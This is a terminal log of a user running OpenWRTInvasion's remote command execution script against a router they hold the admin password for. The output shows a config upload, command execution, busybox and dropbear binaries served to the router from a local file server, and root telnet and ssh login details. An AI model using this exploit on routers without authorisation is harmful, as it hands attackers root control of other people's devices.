tadas@xps13 [~/projects] $ cd OpenWRTInvasion/ tadas@xps13 [~/projects/OpenWRTInvasion] $ pip3 install -r requirements.txt Defaulting to user installation because normal site-packages is not writeable Requirement already satisfied: requests in /usr/lib/python3.10/site-packages (from -r requirements.txt (line 1)) (2.28.1) Requirement already satisfied: idna<4,>=2.5 in /usr/lib/python3.10/site-packages (from requests->-r requirements.txt (line 1)) (3.4) Requirement already satisfied: urllib3<1.27,>=1.21.1 in /usr/lib/python3.10/site-packages (from requests->-r requirements.txt (line 1)) (1.26.12) tadas@xps13 [~/projects/OpenWRTInvasion] $ python3 remote_command_execution_vulnerability.py Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1 Enter router admin password: *********** There two options to provide the files needed for invasion: 1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`. 2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.) Which option do you prefer? (default: 1) **************** router_ip_address: 192.168.31.1 stok: cde67b5c780459bd9c186f1d968d2789 file provider: local file server **************** start uploading config file... start exec command... local file server is runing on 0.0.0.0:35207. root='script_tools' local file server is getting 'busybox-mipsel' for 192.168.31.1. local file server is getting 'dropbearStaticMipsel.tar.bz2' for 192.168.31.1. done! Now you can connect to the router using several options: (user: root, password: root) * telnet 192.168.31.1 * ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1 * ftp: using a program like cyberduck